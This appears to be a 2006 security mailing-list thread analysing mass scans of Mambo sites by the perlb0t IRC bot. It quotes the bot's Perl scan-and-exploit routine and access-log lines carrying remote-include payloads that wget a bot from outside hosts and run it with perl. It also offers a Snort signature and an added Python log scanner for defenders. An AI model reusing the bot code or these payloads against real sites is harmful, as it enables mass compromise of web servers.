Incidents
Re: High volume of Mambo scans (perlb0t) May 14 2006 11:34PM
Jamie Riden (jamesr europe com) (1 replies)
Seems to have some kind of google search code for the particular
vulnerability - haven't seen this before:

if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
    srand;
    my $itime = time;
    my ($cur_time);
    my ($exploited);
    $boturl=$2;
    $cur_time = time - $itime;$exploited = 0;
    while($1>$cur_time){
        $cur_time = time - $itime;
        @urls=fetch();
        foreach $url (@urls) {
            sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Trying to exploit ".$url);
            $cur_time = time - $itime;
            my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
            $url =$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?";
            $page = http_query($url);
            $exploited = $exploited + 1;
        }
    }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");

This is a quick stab at a snort sig:

alert tcp $EXTERNAL_NET !21:443 -> $HOME_NET !80 (msg: "BLEEDING-EDGE
perlb0t Bot Reporting Scan/Exploit"; flow: to_server,established;
content:"PRIVMSG|20|"; nocase; depth: 80; tag: session, 20, packets;
pcre:"/(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)/i"; within:16;
pcre:"/(Exploiting|Exploited|Attacking|Scanning|perlb0t)/i";
classtype: trojan-activity; sid: xxxx; rev:1; )

but I'm sure this could be improved.

cheers,
Jamie

On 15/05/06, Jamie Riden <jamesr (at) europe (dot) com [email concealed]> wrote:
> Looks like some sort of shellbot wanting to connect to an IRC channel
> #abusers on abuser.hacked.in:8080.
>
> I've been seeing occasional probes for Mambo's index.php on and off
> for a while now - the first part is similar to
> http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf but the
> payloads are slightly different, though it always seems to end up with
> an IRC bot of some kind.
>
> I usually see them coupled with scans for coppermine and other remote
> include issues, plus xmlrpc probes.
>
> I think you're seeing an attempt to exploit issue#3 here -
> http://secunia.com/advisories/18935/
>
> cheers,
> Jamie
>
> On 14/05/06, Daniel Cid <danielcid (at) yahoo.com (dot) br [email concealed]> wrote:
> > Since Thursday night I'm seeing a high volume of scans
> > on different web servers for possibly the following
> > vulns:
> >
> > http://secunia.com/advisories/14337/
> > http://www.osvdb.org/displayvuln.php?osvdb_id=10180
> >
> >
> > However, they say the problem is on function.php and
> > I'm seeing them on index.php. Can anyone confirm that?
> >
> > Some log samples:
> >
> > 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
>
> --
> Jamie Riden / jamesr (at) europe (dot) com [email concealed] / jamie.riden (at) computer (dot) org [email concealed]
> NZ Honeynet project - http://www.nz-honeynet.org/
>

--
Jamie Riden / jamesr (at) europe (dot) com [email concealed] / jamie.riden (at) computer (dot) org [email concealed]
NZ Honeynet project - http://www.nz-honeynet.org/
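The probes Daniel quotes all share one shape: a request to index.php carrying GLOBALS= together with mosConfig_absolute_path= pointing at a remote URL (the register_globals remote-include vector the bot's "google" routine builds), with the command the dropped script should run in a cmd= parameter. That shape is easy to pick out of a web server log on the defending side. The following is an added example, not code from this thread or from any of the posters: a small Python scanner that parses Apache combined-format lines, flags requests where mosConfig_absolute_path is a remote URL, pulls out the source IP, the host serving the include, the decoded cmd= string and the response status, and rolls the hits up per source address. The log lines in SAMPLE_LOG are constructed for the example (RFC 5737 addresses and .invalid hostnames); they copy the layout of the quoted samples, not the real probe sources.

```python
"""Flag Mambo/Joomla mosConfig_absolute_path remote-include probes in an
Apache combined-format access log.

Added example; not code from the original thread.  SAMPLE_LOG is constructed
(documentation IP ranges, .invalid hostnames) to mirror the shape of the
probes quoted in the thread.
"""
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The parameter the probe abuses.  A legitimate value is a local filesystem
# path; a remote URL here is the tell-tale sign of an include attempt.
RFI_PARAM = "mosConfig_absolute_path"
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Constructed sample: two probes from one source, one normal request, and one
# request carrying the parameter with a local (non-remote) value.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://payload.invalid/cmd.txt?&cmd=cd%20/tmp;wget%20http://payload.invalid/bot;perl%20bot HTTP/1.0" 404 167 "-" "Mozilla/5.0"
198.51.100.20 - - [12/May/2006:15:30:01 -0300] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://payload.invalid/cmd.txt?&cmd=id HTTP/1.0" 404 167 "-" "Mozilla/5.0"
192.0.2.44 - - [12/May/2006:16:50:02 -0300] "GET /index.php?mosConfig_absolute_path=/var/www/mambo HTTP/1.1" 200 4000 "-" "curl/7.15"
"""


def parse_query(target):
    """Split a request target into (path, [(key, value), ...]) with values
    percent-decoded.  Done by hand rather than with urllib's parse_qs because
    the cmd= value contains ';', which older parse_qs versions treat as a
    separator, and because the include URL itself ends in a literal '?'."""
    path, sep, query = target.partition('?')
    params = []
    if sep:
        for piece in query.split('&'):
            if piece:
                key, _, value = piece.partition('=')
                params.append((unquote(key), unquote(value)))
    return path, params


def classify(line):
    """Return a dict describing the probe, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, params = parse_query(m.group('target'))
    lookup = dict(params)
    include = lookup.get(RFI_PARAM)
    if include is None or not REMOTE_RE.match(include):
        return None  # parameter absent, or a local path: not an include attempt
    return {
        'ip': m.group('ip'),
        'time': m.group('time'),
        'path': path,
        'include_host': urlsplit(include).hostname,
        'include_url': include,
        'cmd': lookup.get('cmd'),
        'status': int(m.group('status')),  # 200 here deserves a closer look than 404
    }


def scan(log_text):
    """All remote-include hits in a block of log text, in order."""
    return [h for h in (classify(l) for l in log_text.splitlines()) if h]


def summarize(hits):
    """Per source IP: number of probes and the set of hosts serving the include."""
    by_ip = defaultdict(lambda: {'count': 0, 'hosts': set()})
    for h in hits:
        by_ip[h['ip']]['count'] += 1
        by_ip[h['ip']]['hosts'].add(h['include_host'])
    return dict(by_ip)


if __name__ == '__main__':
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f"{h['time']} {h['ip']} -> include from {h['include_host']} "
              f"cmd={h['cmd']!r} status={h['status']}")
    for ip, info in summarize(found).items():
        print(f"{ip}: {info['count']} probe(s), include hosts {sorted(info['hosts'])}")
```

Feeding a real access log through scan() gives the list of hosts that attackers are using to serve the include and the dropper, which is the useful blocklist output; the status field is kept so that a hit with a 200 response, rather than the 404s Daniel is seeing, can be escalated, since that is the case where the include may actually have been fetched and run.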

Re: High volume of Mambo scans (perlb0t) May 15 2006 01:54PM
Daniel Cid (danielcid yahoo com br) (2 replies)
Re: High volume of Mambo scans (perlb0t) May 15 2006 05:36PM
Yuri Slobodyanyuk (yurisk inbox ru)
Re: High volume of Mambo scans (perlb0t) May 15 2006 05:26PM
Peter Kosinar (goober ksp sk)


Copyright 2010, SecurityFocus